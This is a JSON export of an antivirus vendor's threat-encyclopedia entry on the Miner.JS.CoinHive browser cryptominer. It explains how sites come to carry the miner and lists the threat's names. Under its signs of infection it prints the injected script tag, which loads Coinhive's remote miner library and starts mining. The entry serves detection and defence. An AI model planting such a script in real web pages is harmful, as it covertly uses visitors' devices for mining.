{"id":291,"date":"2020-12-07T05:15:11","date_gmt":"2020-12-07T05:15:11","guid":{"rendered":"https:\/\/threats.amnpardaz.com\/en\/?p=291"},"modified":"2023-02-07T08:36:32","modified_gmt":"2023-02-07T08:36:32","slug":"miner-js-coinhive","status":"publish","type":"post","link":"https:\/\/threats.amnpardaz.com\/en\/2020\/12\/07\/miner-js-coinhive\/","title":{"rendered":"Miner.JS.CoinHive"},"content":{"rendered":"<h2>General Explanation<\/h2>\n<p><strong>Type:<\/strong> Script<\/p>\n<p><strong>Degree of destruction:<\/strong> low<\/p>\n<p><strong>Prevalence:<\/strong> high<\/p>\n<p><strong>Names of the malware:<\/strong><\/p>\n<ul>\n<li>Miner.JS.CoinHive<\/li>\n<li>Trojan.JS.CoinMiner.Hive<\/li>\n<\/ul>\n<h3>What is Web Miner?<\/h3>\n<p>Web Miner is a script that will be placed on a site host and the script will be run on the browser and start to extract the cryptocurrency when the user visits the webpage. In fact, you have a computer that is the aim of cybercriminals and they extract cryptocurrency through it.<\/p>\n<p><strong>There are three possibilities for a site to be infected:<\/strong><\/p>\n<ol>\n<li style=\"min-height: 1.5em\">The site is hacked and the script added to it without the site admin&#8217;s notice<\/li>\n<li style=\"min-height: 1.5em\">The site admin, intentionally adds the script to the site.<\/li>\n<li style=\"min-height: 1.5em\">One of the network equipment in between, adds the script to the site.<\/li>\n<\/ol>\n<h3>What is Coinhive malware?<\/h3>\n<p>Coinhive malware is a type of cryptocurrency extract script and each client who wants to connect to the infected site will be exposed to infection. So the Miner script will be run on his\/her system.<\/p>\n<h2>Technical Explanation<\/h2>\n<h3><strong>Signs of infection<\/strong><\/h3>\n<p>The way of using the malware script is as follows:<\/p>\n<p>&lt;script src=\u201dhttps:\/\/coinhive.com\/lib\/coinhive.min.js\u201d&gt;&lt;\/script&gt;<br \/>\n&lt;script&gt;<br \/>\nvar miner = new CoinHive.User(\u2018SITE_KEY\u2019, \u2018john-doe\u2019);<br \/>\nminer.start();<br \/>\n&lt;\/script&gt;<\/p>\n<h2>How to deal with it and disinfect the system<\/h2>\n<p><a href=\"https:\/\/padvish.com\/en-us\/Main\" target=\"_blank\" rel=\"noopener\">Padvish Antivirus<\/a> firewall will prevent network attacks from this malware. Also, it will detect the js file of the malware. Therefore, to prevent infection it is recommended to install Padvish and prevent the malware from entering your system.<\/p>\n<p><a href=\"https:\/\/kb.amnpardaz.com\/en\/2020\/95\/what-does-miner-js-coinhive-a-threat-means-and-how-to-deal-with-it\/\" target=\"_blank\" rel=\"noopener\">What does Miner.JS.CoinHive.a threat means and how to deal with it?\u00a0<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>General Explanation Type: Script Degree of destruction: low Prevalence: high Names of the malware: Miner.JS.CoinHive Trojan.JS.CoinMiner.Hive What is Web Miner? Web Miner is a script that will be placed on a site host and the script will be run on the browser and start to extract the cryptocurrency when the user visits the webpage. In&hellip;<\/p>\n","protected":false},"author":16,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9,11],"tags":[16],"class_list":["post-291","post","type-post","status-publish","format-standard","hentry","category-miner","category-scripts","tag-ips"],"_links":{"self":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/291","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/users\/16"}],"replies":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/comments?post=291"}],"version-history":[{"count":7,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/291\/revisions"}],"predecessor-version":[{"id":1263,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/291\/revisions\/1263"}],"wp:attachment":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/media?parent=291"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/categories?post=291"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/tags?post=291"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}